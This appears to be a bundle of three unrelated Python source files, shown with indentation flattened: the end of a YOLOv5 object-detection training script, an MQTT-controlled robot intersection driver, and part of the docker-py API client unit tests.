for i, (imgs, targets, paths, _) in pbar: # batch -------------------------------------------------------------
ni = i + nb * epoch # number integrated batches (since train start)
imgs = imgs.to(device, non_blocking=True).float() / 255.0 # uint8 to float32, 0-255 to 0.0-1.0
# Warmup
if ni <= nw:
xi = [0, nw] # x interp
# model.gr = np.interp(ni, xi, [0.0, 1.0]) # iou loss ratio (obj_loss = 1.0 or iou)
accumulate = max(1, np.interp(ni, xi, [1, nbs / total_batch_size]).round())
for j, x in enumerate(optimizer.param_groups):
# bias lr falls from 0.1 to lr0, all other lrs rise from 0.0 to lr0
x['lr'] = np.interp(ni, xi, [hyp['warmup_bias_lr'] if j == 2 else 0.0, x['initial_lr'] * lf(epoch)])
if 'momentum' in x:
x['momentum'] = np.interp(ni, xi, [hyp['warmup_momentum'], hyp['momentum']])
# Multi-scale
if opt.multi_scale:
sz = random.randrange(imgsz * 0.5, imgsz * 1.5 + gs) // gs * gs # size
sf = sz / max(imgs.shape[2:]) # scale factor
if sf != 1:
ns = [math.ceil(x * sf / gs) * gs for x in imgs.shape[2:]] # new shape (stretched to gs-multiple)
imgs = F.interpolate(imgs, size=ns, mode='bilinear', align_corners=False)
# Forward
with amp.autocast(enabled=cuda):
pred = model(imgs) # forward
loss, loss_items = compute_loss(pred, targets.to(device)) # loss scaled by batch_size
if rank != -1:
loss *= opt.world_size # gradient averaged between devices in DDP mode
if opt.quad:
loss *= 4.
# Backward
scaler.scale(loss).backward()
# Optimize
if ni % accumulate == 0:
scaler.step(optimizer) # optimizer.step
scaler.update()
optimizer.zero_grad()
if ema:
ema.update(model)
# Print
if rank in [-1, 0]:
mloss = (mloss * i + loss_items) / (i + 1) # update mean losses
mem = '%.3gG' % (torch.cuda.memory_reserved() / 1E9 if torch.cuda.is_available() else 0) # (GB)
s = ('%10s' * 2 + '%10.4g' * 6) % (
'%g/%g' % (epoch, epochs - 1), mem, *mloss, targets.shape[0], imgs.shape[-1])
pbar.set_description(s)
# Plot
if plots and ni < 3:
f = save_dir / f'train_batch{ni}.jpg' # filename
Thread(target=plot_images, args=(imgs, targets, paths, f), daemon=True).start()
# if tb_writer:
# tb_writer.add_image(f, result, dataformats='HWC', global_step=epoch)
# tb_writer.add_graph(model, imgs) # add model to tensorboard
elif plots and ni == 10 and wandb_logger.wandb:
wandb_logger.log({"Mosaics": [wandb_logger.wandb.Image(str(x), caption=x.name) for x in
save_dir.glob('train*.jpg') if x.exists()]})
# end batch ------------------------------------------------------------------------------------------------
# end epoch ----------------------------------------------------------------------------------------------------
# Scheduler
lr = [x['lr'] for x in optimizer.param_groups] # for tensorboard
scheduler.step()
# DDP process 0 or single-GPU
if rank in [-1, 0]:
# mAP
ema.update_attr(model, include=['yaml', 'nc', 'hyp', 'gr', 'names', 'stride', 'class_weights'])
final_epoch = epoch + 1 == epochs
if not opt.notest or final_epoch: # Calculate mAP
wandb_logger.current_epoch = epoch + 1
results, maps, times = test.test(data_dict,
batch_size=batch_size * 2,
imgsz=imgsz_test,
model=ema.ema,
single_cls=opt.single_cls,
dataloader=testloader,
save_dir=save_dir,
verbose=nc < 50 and final_epoch,
plots=plots and final_epoch,
wandb_logger=wandb_logger,
compute_loss=compute_loss,
is_coco=is_coco)
# Write
with open(results_file, 'a') as f:
f.write(s + '%10.4g' * 7 % results + '\n') # append metrics, val_loss
if len(opt.name) and opt.bucket:
os.system('gsutil cp %s gs://%s/results/results%s.txt' % (results_file, opt.bucket, opt.name))
# Log
tags = ['train/box_loss', 'train/obj_loss', 'train/cls_loss', # train loss
'metrics/precision', 'metrics/recall', 'metrics/mAP_0.5', 'metrics/mAP_0.5:0.95',
'val/box_loss', 'val/obj_loss', 'val/cls_loss', # val loss
'x/lr0', 'x/lr1', 'x/lr2'] # params
for x, tag in zip(list(mloss[:-1]) + list(results) + lr, tags):
if tb_writer:
tb_writer.add_scalar(tag, x, epoch) # tensorboard
if wandb_logger.wandb:
wandb_logger.log({tag: x}) # W&B
# Update best mAP
fi = fitness(np.array(results).reshape(1, -1)) # weighted combination of [P, R, mAP@.5, mAP@.5-.95]
if fi > best_fitness:
best_fitness = fi
wandb_logger.end_epoch(best_result=best_fitness == fi)
# Save model
if (not opt.nosave) or (final_epoch and not opt.evolve): # if save
ckpt = {'epoch': epoch,
'best_fitness': best_fitness,
'training_results': results_file.read_text(),
'model': deepcopy(model.module if is_parallel(model) else model).half(),
'ema': deepcopy(ema.ema).half(),
'updates': ema.updates,
'optimizer': optimizer.state_dict(),
'wandb_id': wandb_logger.wandb_run.id if wandb_logger.wandb else None}
# Save last, best and delete
torch.save(ckpt, last)
if best_fitness == fi:
torch.save(ckpt, best)
if wandb_logger.wandb:
if ((epoch + 1) % opt.save_period == 0 and not final_epoch) and opt.save_period != -1:
wandb_logger.log_model(
last.parent, opt, epoch, fi, best_model=best_fitness == fi)
del ckpt
# end epoch ----------------------------------------------------------------------------------------------------
# end training
if rank in [-1, 0]:
# Plots
if plots:
plot_results(save_dir=save_dir) # save as results.png
if wandb_logger.wandb:
files = ['results.png', 'confusion_matrix.png', *[f'{x}_curve.png' for x in ('F1', 'PR', 'P', 'R')]]
wandb_logger.log({"Results": [wandb_logger.wandb.Image(str(save_dir / f), caption=f) for f in files
if (save_dir / f).exists()]})
# Test best.pt
logger.info('%g epochs completed in %.3f hours.\n' % (epoch - start_epoch + 1, (time.time() - t0) / 3600))
if opt.data.endswith('coco.yaml') and nc == 80: # if COCO
for m in (last, best) if best.exists() else (last): # speed, mAP tests
results, _, _ = test.test(opt.data,
batch_size=batch_size * 2,
imgsz=imgsz_test,
conf_thres=0.001,
iou_thres=0.7,
model=attempt_load(m, device).half(),
single_cls=opt.single_cls,
dataloader=testloader,
save_dir=save_dir,
save_json=True,
plots=False,
is_coco=is_coco)
# Strip optimizers
final = best if best.exists() else last # final model
for f in last, best:
if f.exists():
strip_optimizer(f) # strip optimizers
if opt.bucket:
os.system(f'gsutil cp {final} gs://{opt.bucket}/weights') # upload
if wandb_logger.wandb and not opt.evolve: # Log the stripped model
wandb_logger.wandb.log_artifact(str(final), type='model',
name='run_' + wandb_logger.wandb_run.id + '_model',
aliases=['last', 'best', 'stripped'])
wandb_logger.finish_run()
else:
dist.destroy_process_group()
torch.cuda.empty_cache()
return results
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--weights', type=str, default='yolov5s.pt', help='initial weights path')
parser.add_argument('--cfg', type=str, default='', help='model.yaml path')
parser.add_argument('--data', type=str, default='data/coco128.yaml', help='data.yaml path')
parser.add_argument('--hyp', type=str, default='data/hyp.scratch.yaml', help='hyperparameters path')
parser.add_argument('--epochs', type=int, default=300)
parser.add_argument('--batch-size', type=int, default=16, help='total batch size for all GPUs')
parser.add_argument('--img-size', nargs='+', type=int, default=[640, 640], help='[train, test] image sizes')
parser.add_argument('--rect', action='store_true', help='rectangular training')
parser.add_argument('--resume', nargs='?', const=True, default=False, help='resume most recent training')
parser.add_argument('--nosave', action='store_true', help='only save final checkpoint')
parser.add_argument('--notest', action='store_true', help='only test final epoch')
parser.add_argument('--noautoanchor', action='store_true', help='disable autoanchor check')
parser.add_argument('--evolve', action='store_true', help='evolve hyperparameters')
parser.add_argument('--bucket', type=str, default='', help='gsutil bucket')
parser.add_argument('--cache-images', action='store_true', help='cache images for faster training')
parser.add_argument('--image-weights', action='store_true', help='use weighted image selection for training')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--multi-scale', action='store_true', help='vary img-size +/- 50%%')
parser.add_argument('--single-cls', action='store_true', help='train multi-class data as single-class')
parser.add_argument('--adam', action='store_true', help='use torch.optim.Adam() optimizer')
parser.add_argument('--sync-bn', action='store_true', help='use SyncBatchNorm, only available in DDP mode')
parser.add_argument('--local_rank', type=int, default=-1, help='DDP parameter, do not modify')
parser.add_argument('--workers', type=int, default=8, help='maximum number of dataloader workers')
parser.add_argument('--project', default='runs/train', help='save to project/name')
parser.add_argument('--entity', default=None, help='W&B entity')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
parser.add_argument('--quad', action='store_true', help='quad dataloader')
parser.add_argument('--linear-lr', action='store_true', help='linear LR')
parser.add_argument('--label-smoothing', type=float, default=0.0, help='Label smoothing epsilon')
parser.add_argument('--upload_dataset', action='store_true', help='Upload dataset as W&B artifact table')
parser.add_argument('--bbox_interval', type=int, default=-1, help='Set bounding-box image logging interval for W&B')
parser.add_argument('--save_period', type=int, default=-1, help='Log model after every "save_period" epoch')
parser.add_argument('--artifact_alias', type=str, default="latest", help='version of dataset artifact to be used')
opt = parser.parse_args()
# Set DDP variables
opt.world_size = int(os.environ['WORLD_SIZE']) if 'WORLD_SIZE' in os.environ else 1
opt.global_rank = int(os.environ['RANK']) if 'RANK' in os.environ else -1
set_logging(opt.global_rank)
if opt.global_rank in [-1, 0]:
check_git_status()
check_requirements()
# Resume
wandb_run = check_wandb_resume(opt)
if opt.resume and not wandb_run: # resume an interrupted run
ckpt = opt.resume if isinstance(opt.resume, str) else get_latest_run() # specified or most recent path
assert os.path.isfile(ckpt), 'ERROR: --resume checkpoint does not exist'
apriori = opt.global_rank, opt.local_rank
with open(Path(ckpt).parent.parent / 'opt.yaml') as f:
opt = argparse.Namespace(**yaml.load(f, Loader=yaml.SafeLoader)) # replace
opt.cfg, opt.weights, opt.resume, opt.batch_size, opt.global_rank, opt.local_rank = '', ckpt, True, opt.total_batch_size, *apriori # reinstate
logger.info('Resuming training from %s' % ckpt)
else:
# opt.hyp = opt.hyp or ('hyp.finetune.yaml' if opt.weights else 'hyp.scratch.yaml')
opt.data, opt.cfg, opt.hyp = check_file(opt.data), check_file(opt.cfg), check_file(opt.hyp) # check files
assert len(opt.cfg) or len(opt.weights), 'either --cfg or --weights must be specified'
opt.img_size.extend([opt.img_size[-1]] * (2 - len(opt.img_size))) # extend to 2 sizes (train, test)
opt.name = 'evolve' if opt.evolve else opt.name
opt.save_dir = increment_path(Path(opt.project) / opt.name, exist_ok=opt.exist_ok | opt.evolve) # increment run
# DDP mode
opt.total_batch_size = opt.batch_size
device = select_device(opt.device, batch_size=opt.batch_size)
if opt.local_rank != -1:
assert torch.cuda.device_count() > opt.local_rank
torch.cuda.set_device(opt.local_rank)
device = torch.device('cuda', opt.local_rank)
dist.init_process_group(backend='nccl', init_method='env://') # distributed backend
assert opt.batch_size % opt.world_size == 0, '--batch-size must be multiple of CUDA device count'
opt.batch_size = opt.total_batch_size // opt.world_size
# Hyperparameters
with open(opt.hyp) as f:
hyp = yaml.load(f, Loader=yaml.SafeLoader) # load hyps
# Train
logger.info(opt)
if not opt.evolve:
tb_writer = None # init loggers
if opt.global_rank in [-1, 0]:
prefix = colorstr('tensorboard: ')
logger.info(f"{prefix}Start with 'tensorboard --logdir {opt.project}', view at http://localhost:6006/")
tb_writer = SummaryWriter(opt.save_dir) # Tensorboard
train(hyp, opt, device, tb_writer)
# Evolve hyperparameters (optional)
else:
# Hyperparameter evolution metadata (mutation scale 0-1, lower_limit, upper_limit)
meta = {'lr0': (1, 1e-5, 1e-1), # initial learning rate (SGD=1E-2, Adam=1E-3)
'lrf': (1, 0.01, 1.0), # final OneCycleLR learning rate (lr0 * lrf)
'momentum': (0.3, 0.6, 0.98), # SGD momentum/Adam beta1
'weight_decay': (1, 0.0, 0.001), # optimizer weight decay
'warmup_epochs': (1, 0.0, 5.0), # warmup epochs (fractions ok)
'warmup_momentum': (1, 0.0, 0.95), # warmup initial momentum
'warmup_bias_lr': (1, 0.0, 0.2), # warmup initial bias lr
'box': (1, 0.02, 0.2), # box loss gain
'cls': (1, 0.2, 4.0), # cls loss gain
'cls_pw': (1, 0.5, 2.0), # cls BCELoss positive_weight
'obj': (1, 0.2, 4.0), # obj loss gain (scale with pixels)
'obj_pw': (1, 0.5, 2.0), # obj BCELoss positive_weight
'iou_t': (0, 0.1, 0.7), # IoU training threshold
'anchor_t': (1, 2.0, 8.0), # anchor-multiple threshold
'anchors': (2, 2.0, 10.0), # anchors per output grid (0 to ignore)
'fl_gamma': (0, 0.0, 2.0), # focal loss gamma (efficientDet default gamma=1.5)
'hsv_h': (1, 0.0, 0.1), # image HSV-Hue augmentation (fraction)
'hsv_s': (1, 0.0, 0.9), # image HSV-Saturation augmentation (fraction)
'hsv_v': (1, 0.0, 0.9), # image HSV-Value augmentation (fraction)
'degrees': (1, 0.0, 45.0), # image rotation (+/- deg)
'translate': (1, 0.0, 0.9), # image translation (+/- fraction)
'scale': (1, 0.0, 0.9), # image scale (+/- gain)
'shear': (1, 0.0, 10.0), # image shear (+/- deg)
'perspective': (0, 0.0, 0.001), # image perspective (+/- fraction), range 0-0.001
'flipud': (1, 0.0, 1.0), # image flip up-down (probability)
'fliplr': (0, 0.0, 1.0), # image flip left-right (probability)
'mosaic': (1, 0.0, 1.0), # image mixup (probability)
'mixup': (1, 0.0, 1.0)} # image mixup (probability)
assert opt.local_rank == -1, 'DDP mode not implemented for --evolve'
opt.notest, opt.nosave = True, True # only test/save final epoch
# ei = [isinstance(x, (int, float)) for x in hyp.values()] # evolvable indices
yaml_file = Path(opt.save_dir) / 'hyp_evolved.yaml' # save best result here
if opt.bucket:
os.system('gsutil cp gs://%s/evolve.txt .' % opt.bucket) # download evolve.txt if exists
for _ in range(300): # generations to evolve
if Path('evolve.txt').exists(): # if evolve.txt exists: select best hyps and mutate
# Select parent(s)
parent = 'single' # parent selection method: 'single' or 'weighted'
x = np.loadtxt('evolve.txt', ndmin=2)
n = min(5, len(x)) # number of previous results to consider
x = x[np.argsort(-fitness(x))][:n] # top n mutations
w = fitness(x) - fitness(x).min() # weights
if parent == 'single' or len(x) == 1:
# x = x[random.randint(0, n - 1)] # random selection
x = x[random.choices(range(n), weights=w)[0]] # weighted selection
elif parent == 'weighted':
x = (x * w.reshape(n, 1)).sum(0) / w.sum() # weighted combination
# Mutate
mp, s = 0.8, 0.2 # mutation probability, sigma
npr = np.random
npr.seed(int(time.time()))
g = np.array([x[0] for x in meta.values()]) # gains 0-1
ng = len(meta)
v = np.ones(ng)
while all(v == 1): # mutate until a change occurs (prevent duplicates)
v = (g * (npr.random(ng) < mp) * npr.randn(ng) * npr.random() * s + 1).clip(0.3, 3.0)
for i, k in enumerate(hyp.keys()): # plt.hist(v.ravel(), 300)
hyp[k] = float(x[i + 7] * v[i]) # mutate
# Constrain to limits
for k, v in meta.items():
hyp[k] = max(hyp[k], v[1]) # lower limit
hyp[k] = min(hyp[k], v[2]) # upper limit
hyp[k] = round(hyp[k], 5) # significant digits
# Train mutation
results = train(hyp.copy(), opt, device)
# Write mutation results
print_mutation(hyp.copy(), results, yaml_file, opt.bucket)
# Plot results
plot_evolution(yaml_file)
print(f'Hyperparameter evolution complete. Best results saved as: {yaml_file}\n'
f'Command to train a new model with these hyperparameters: $ python train.py --hyp {yaml_file}')
|
bot.py
|
#!/usr/bin/python
import sys
import paho.mqtt.client as paho
import json
import threading
import Queue
import motion
import sensor
import os
from time import sleep
from time import time
from time import strftime
os.system("sntp -s 129.6.15.30 &>/dev/null")
# queue of commands for inter thread communication
command_q = Queue.Queue() # STOP_AT_RED, GO_AT_RED
# Create topic from bot_id
def get_topic(bot_id):
return "wolfbot/" + bot_id + "/command"
# initialze a client and connect to the server
def prepare_mqttc(mqtt_host, bot_id, mqtt_port):
# create a mqtt client
mqttc = paho.Client(client_id="bot_" + bot_id)
mqttc.on_message = on_command
mqttc.connect(host=mqtt_host, port=mqtt_port, keepalive=60)
# subscribe to TOPIC
topic = get_topic(bot_id)
print topic
mqttc.subscribe(topic)
return mqttc
# create request json
def create_pass_request(bot_id, bot_type, enter_lane, exit_lane):
msg = {}
msg["bot_id"] = bot_id
msg["bot_type"] = bot_type
msg["enter"] = enter_lane
msg["exit"] = exit_lane
msg["respond_to"] = get_topic(bot_id)
return json.dumps(msg)
# create complete json
def create_complete_msg(bot_id, bot_type):
msg = {}
msg["bot_id"] = bot_id
msg["bot_type"] = bot_type
msg["status"] = "complete"
return json.dumps(msg)
# The callback for when a PUBLISH message is received from the server.
def on_command(mqttc, userdata, msg):
print msg.payload
# parse the payload
pass_comm = json.loads(msg.payload)
# send a command to the driver thread
if pass_comm["command"] == "go":
command_q.put("GO_AT_RED")
print "GO_AT_RED " + str(strftime("%Y-%m-%d %H:%M:%S"))
else:
command_q.put("STOP_AT_RED")
print "STOP_AT_RED " + str(strftime("%Y-%m-%d %H:%M:%S"))
# the driver function which controls the bot.
def driver(mqttc, bot_id, bot_type, entry_lane, exit_lane, command_q):
# check entry and exit lanes
if entry_lane < 1 or entry_lane > 4 or exit_lane < 1 or exit_lane > 4 or entry_lane == exit_lane:
print "Invalid entry or exit lane"
return
# motion object to achieve line following
bot_motion = motion.Motion()
if bot_motion.valid == False:
print "Error in creating Motion object"
mqttc.disconnect()
return
# give time to manually align the bot
print "Manually align the bot"
sleep(2)
# sensor object to read markings on road
bot_sensor = sensor.Sensor()
#journey_state : AT_SRC, NEED_BLACK, REQUEST, NEED_RED, WAITING, CROSSING, DEPARTING, AT_DEST
journey_state = "AT_SRC"
# by default, stop at red
command = "STOP_AT_RED"
# loop to control the motion and sensors based on TIM command
while (True):
# check for any commands from master thread
if command_q.empty() == False:
command = command_q.get()
# state machine using ifelse control
if journey_state == "AT_SRC":
# at the start of the entry lane
bot_motion.start()
journey_state = "NEED_BLACK"
elif journey_state == "NEED_BLACK":
# moving on the entry lane up until red line, also make request to TIM
# keep waiting till first black line
if bot_sensor.is_Black() == False:
continue
journey_state = "REQUEST"
elif journey_state == "REQUEST":
# request TIM to pass the intersection
pass_req = create_pass_request(bot_id, bot_type, entry_lane, exit_lane)
mqttc.publish("tim/jid_1/request", pass_req)
print "REQUESTED " + str(strftime("%Y-%m-%d %H:%M:%S"))
journey_state = "NEED_RED"
elif journey_state == "NEED_RED":
# keep waiting till you come across red line
if bot_sensor.is_Red() == False:
continue
print "RED " + str(strftime("%Y-%m-%d %H:%M:%S"))
# stop the bot and go to wait state
bot_motion.stop()
journey_state = "WAITING"
elif journey_state == "WAITING":
# waiting at red line for a go command from TIM
if command == "STOP_AT_RED":
continue
journey_state = "CROSSING"
elif journey_state == "CROSSING":
# left / right / straight logic
diff = abs(entry_lane - exit_lane)
if diff % 2 == 0:
bot_motion.cross_straight()
else:
if entry_lane + exit_lane == 5 and abs(entry_lane - exit_lane) == 3:
if entry_lane < exit_lane:
bot_motion.cross_right()
else:
bot_motion.cross_left()
else:
if entry_lane > exit_lane:
bot_motion.cross_right()
else:
bot_motion.cross_left()
journey_state = "DEPARTING"
elif journey_state == "DEPARTING":
# give time to manually align the bot
print "Manually align the bot"
sleep(1.5)
# start line following on the exit lane
bot_motion.start()
# wait for 3 seconds before notifying that the junction is empty
sleep(3)
complete_msg = create_complete_msg(bot_id, bot_type)
mqttc.publish("tim/jid_1/complete", complete_msg)
print "COMPLETED " + str(strftime("%Y-%m-%d %H:%M:%S"))
# travel for few more sec on the exit lane bofore stopping
sleep(6) # sleep because there is nothing else to do
journey_state = "AT_DEST"
elif journey_state == "AT_DEST":
# on reaching the end of the exit lane
bot_motion.stop()
# disconnect after reaching the destination
mqttc.disconnect()
break
# main function
def main():
# check usage
if len(sys.argv) != 6 and len(sys.argv) != 7:
print "Usage : python tim.py BOT_ID BOT_TYPE ENTRY_LANE EXIT_LANE MOSQUITTO_HOST <MOSQUITTO_PORT>"
exit(1)
# process command line arguments
bot_id = sys.argv[1]
bot_type = sys.argv[2]
entry_lane = int(sys.argv[3])
exit_lane = int(sys.argv[4])
mqtt_host = sys.argv[5]
if(len(sys.argv) == 7):
mqtt_port = int(sys.argv[6])
else:
mqtt_port = 1883
if bot_type != "civilian" and bot_type != "ems":
print "Invalid bot type : civilian / ems"
exit(1)
if exit_lane > 4 or exit_lane < 1:
print "Invalid exit lane : 1 to 4"
exit(1)
if entry_lane > 4 or entry_lane < 1:
print "Invalid exit lane : 1 to 4"
exit(1)
# get mqtt client
mqttc = prepare_mqttc(mqtt_host, bot_id, mqtt_port)
# create a thread for the driver function
driver_thread = threading.Thread(target = driver, args = (mqttc, bot_id, bot_type, entry_lane, exit_lane, command_q))
driver_thread.start()
# Blocking call that processes network traffic, dispatches callbacks and
# handles reconnecting.
# Other loop*() functions are available that give a threaded interface and a
# manual interface.
mqttc.loop_forever()
print "Terminating"
if __name__ == "__main__":
main()
|
api_test.py
|
import datetime
import json
import io
import os
import re
import shutil
import socket
import tempfile
import threading
import time
import unittest
import docker
from docker.api import APIClient
import requests
from requests.packages import urllib3
import six
from . import fake_api
import pytest
try:
from unittest import mock
except ImportError:
import mock
DEFAULT_TIMEOUT_SECONDS = docker.constants.DEFAULT_TIMEOUT_SECONDS
def response(status_code=200, content='', headers=None, reason=None, elapsed=0,
request=None, raw=None):
res = requests.Response()
res.status_code = status_code
if not isinstance(content, six.binary_type):
content = json.dumps(content).encode('ascii')
res._content = content
res.headers = requests.structures.CaseInsensitiveDict(headers or {})
res.reason = reason
res.elapsed = datetime.timedelta(elapsed)
res.request = request
res.raw = raw
return res
def fake_resolve_authconfig(authconfig, registry=None, *args, **kwargs):
return None
def fake_inspect_container(self, container, tty=False):
return fake_api.get_fake_inspect_container(tty=tty)[1]
def fake_resp(method, url, *args, **kwargs):
key = None
if url in fake_api.fake_responses:
key = url
elif (url, method) in fake_api.fake_responses:
key = (url, method)
if not key:
raise Exception('{0} {1}'.format(method, url))
status_code, content = fake_api.fake_responses[key]()
return response(status_code=status_code, content=content)
fake_request = mock.Mock(side_effect=fake_resp)
def fake_get(self, url, *args, **kwargs):
return fake_request('GET', url, *args, **kwargs)
def fake_post(self, url, *args, **kwargs):
return fake_request('POST', url, *args, **kwargs)
def fake_put(self, url, *args, **kwargs):
return fake_request('PUT', url, *args, **kwargs)
def fake_delete(self, url, *args, **kwargs):
return fake_request('DELETE', url, *args, **kwargs)
def fake_read_from_socket(self, response, stream, tty=False):
return six.binary_type()
url_base = '{0}/'.format(fake_api.prefix)
url_prefix = '{0}v{1}/'.format(
url_base,
docker.constants.DEFAULT_DOCKER_API_VERSION)
class BaseAPIClientTest(unittest.TestCase):
def setUp(self):
self.patcher = mock.patch.multiple(
'docker.api.client.APIClient',
get=fake_get,
post=fake_post,
put=fake_put,
delete=fake_delete,
_read_from_socket=fake_read_from_socket
)
self.patcher.start()
self.client = APIClient()
# Force-clear authconfig to avoid tampering with the tests
self.client._cfg = {'Configs': {}}
def tearDown(self):
self.client.close()
self.patcher.stop()
def base_create_payload(self, img='busybox', cmd=None):
if not cmd:
cmd = ['true']
return {"Tty": False, "Image": img, "Cmd": cmd,
"AttachStdin": False,
"AttachStderr": True, "AttachStdout": True,
"StdinOnce": False,
"OpenStdin": False, "NetworkDisabled": False,
}
class DockerApiTest(BaseAPIClientTest):
def test_ctor(self):
with pytest.raises(docker.errors.DockerException) as excinfo:
APIClient(version=1.12)
assert str(
excinfo.value
) == 'Version parameter must be a string or None. Found float'
def test_url_valid_resource(self):
url = self.client._url('/hello/{0}/world', 'somename')
assert url == '{0}{1}'.format(url_prefix, 'hello/somename/world')
url = self.client._url(
'/hello/{0}/world/{1}', 'somename', 'someothername'
)
assert url == '{0}{1}'.format(
url_prefix, 'hello/somename/world/someothername'
)
url = self.client._url('/hello/{0}/world', 'some?name')
assert url == '{0}{1}'.format(url_prefix, 'hello/some%3Fname/world')
url = self.client._url("/images/{0}/push", "localhost:5000/image")
assert url == '{0}{1}'.format(
url_prefix, 'images/localhost:5000/image/push'
)
def test_url_invalid_resource(self):
with pytest.raises(ValueError):
self.client._url('/hello/{0}/world', ['sakuya', 'izayoi'])
def test_url_no_resource(self):
url = self.client._url('/simple')
assert url == '{0}{1}'.format(url_prefix, 'simple')
def test_url_unversioned_api(self):
url = self.client._url(
'/hello/{0}/world', 'somename', versioned_api=False
)
assert url == '{0}{1}'.format(url_base, 'hello/somename/world')
def test_version(self):
self.client.version()
fake_request.assert_called_with(
'GET',
url_prefix + 'version',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_version_no_api_version(self):
self.client.version(False)
fake_request.assert_called_with(
'GET',
url_base + 'version',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_retrieve_server_version(self):
client = APIClient(version="auto")
assert isinstance(client._version, six.string_types)
assert not (client._version == "auto")
client.close()
def test_auto_retrieve_server_version(self):
version = self.client._retrieve_server_version()
assert isinstance(version, six.string_types)
def test_info(self):
self.client.info()
fake_request.assert_called_with(
'GET',
url_prefix + 'info',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_search(self):
self.client.search('busybox')
fake_request.assert_called_with(
'GET',
url_prefix + 'images/search',
params={'term': 'busybox'},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_login(self):
self.client.login('sakuya', 'izayoi')
args = fake_request.call_args
assert args[0][0] == 'POST'
assert args[0][1] == url_prefix + 'auth'
assert json.loads(args[1]['data']) == {
'username': 'sakuya', 'password': 'izayoi'
}
assert args[1]['headers'] == {'Content-Type': 'application/json'}
assert self.client._auth_configs['auths'] == {
'docker.io': {
'email': None,
'password': 'izayoi',
'username': 'sakuya',
'serveraddress': None,
}
}
def test_events(self):
self.client.events()
fake_request.assert_called_with(
'GET',
url_prefix + 'events',
params={'since': None, 'until': None, 'filters': None},
stream=True,
timeout=None
)
def test_events_with_since_until(self):
ts = 1356048000
now = datetime.datetime.utcfromtimestamp(ts)
since = now - datetime.timedelta(seconds=10)
until = now + datetime.timedelta(seconds=10)
self.client.events(since=since, until=until)
fake_request.assert_called_with(
'GET',
url_prefix + 'events',
params={
'since': ts - 10,
'until': ts + 10,
'filters': None
},
stream=True,
timeout=None
)
def test_events_with_filters(self):
filters = {'event': ['die', 'stop'],
'container': fake_api.FAKE_CONTAINER_ID}
self.client.events(filters=filters)
expected_filters = docker.utils.convert_filters(filters)
fake_request.assert_called_with(
'GET',
url_prefix + 'events',
params={
'since': None,
'until': None,
'filters': expected_filters
},
stream=True,
timeout=None
)
def _socket_path_for_client_session(self, client):
socket_adapter = client.get_adapter('http+docker://')
return socket_adapter.socket_path
def test_url_compatibility_unix(self):
c = APIClient(base_url="unix://socket")
assert self._socket_path_for_client_session(c) == '/socket'
def test_url_compatibility_unix_triple_slash(self):
c = APIClient(base_url="unix:///socket")
assert self._socket_path_for_client_session(c) == '/socket'
def test_url_compatibility_http_unix_triple_slash(self):
c = APIClient(base_url="http+unix:///socket")
assert self._socket_path_for_client_session(c) == '/socket'
def test_url_compatibility_http(self):
c = APIClient(base_url="http://hostname:1234")
assert c.base_url == "http://hostname:1234"
def test_url_compatibility_tcp(self):
c = APIClient(base_url="tcp://hostname:1234")
assert c.base_url == "http://hostname:1234"
def test_remove_link(self):
self.client.remove_container(fake_api.FAKE_CONTAINER_ID, link=True)
fake_request.assert_called_with(
'DELETE',
url_prefix + 'containers/3cc2351ab11b',
params={'v': False, 'link': True, 'force': False},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_create_host_config_secopt(self):
security_opt = ['apparmor:test_profile']
result = self.client.create_host_config(security_opt=security_opt)
assert 'SecurityOpt' in result
assert result['SecurityOpt'] == security_opt
with pytest.raises(TypeError):
self.client.create_host_config(security_opt='wrong')
def test_stream_helper_decoding(self):
status_code, content = fake_api.fake_responses[url_prefix + 'events']()
content_str = json.dumps(content)
if six.PY3:
content_str = content_str.encode('utf-8')
body = io.BytesIO(content_str)
# mock a stream interface
raw_resp = urllib3.HTTPResponse(body=body)
setattr(raw_resp._fp, 'chunked', True)
setattr(raw_resp._fp, 'chunk_left', len(body.getvalue()) - 1)
# pass `decode=False` to the helper
raw_resp._fp.seek(0)
resp = response(status_code=status_code, content=content, raw=raw_resp)
result = next(self.client._stream_helper(resp))
assert result == content_str
# pass `decode=True` to the helper
raw_resp._fp.seek(0)
resp = response(status_code=status_code, content=content, raw=raw_resp)
result = next(self.client._stream_helper(resp, decode=True))
assert result == content
# non-chunked response, pass `decode=False` to the helper
setattr(raw_resp._fp, 'chunked', False)
raw_resp._fp.seek(0)
resp = response(status_code=status_code, content=content, raw=raw_resp)
result = next(self.client._stream_helper(resp))
assert result == content_str.decode('utf-8')
# non-chunked response, pass `decode=True` to the helper
raw_resp._fp.seek(0)
resp = response(status_code=status_code, content=content, raw=raw_resp)
result = next(self.client._stream_helper(resp, decode=True))
assert result == content
class UnixSocketStreamTest(unittest.TestCase):
def setUp(self):
socket_dir = tempfile.mkdtemp()
self.build_context = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, socket_dir)
self.addCleanup(shutil.rmtree, self.build_context)
self.socket_file = os.path.join(socket_dir, 'test_sock.sock')
self.server_socket = self._setup_socket()
self.stop_server = False
server_thread = threading.Thread(target=self.run_server)
server_thread.setDaemon(True)
server_thread.start()
self.response = None
self.request_handler = None
self.addCleanup(server_thread.join)
self.addCleanup(self.stop)
def stop(self):
self.stop_server = True
def _setup_socket(self):
server_sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
server_sock.bind(self.socket_file)
# Non-blocking mode so that we can shut the test down easily
server_sock.setblocking(0)
server_sock.listen(5)
return server_sock
def run_server(self):
try:
while not self.stop_server:
try:
connection, client_address = self.server_socket.accept()
except socket.error:
# Probably no connection to accept yet
time.sleep(0.01)
continue
connection.setblocking(1)
try:
self.request_handler(connection)
finally:
connection.close()
finally:
self.server_socket.close()
def early_response_sending_handler(self, connection):
data = b''
headers = None
connection.sendall(self.response)
while not headers:
data += connection.recv(2048)
parts = data.split(b'\r\n\r\n', 1)
if len(parts) == 2:
headers, data = parts
mo = re.search(r'Content-Length: ([0-9]+)', headers.decode())
assert mo
content_length = int(mo.group(1))
while True:
if len(data) >= content_length:
break
data += connection.recv(2048)
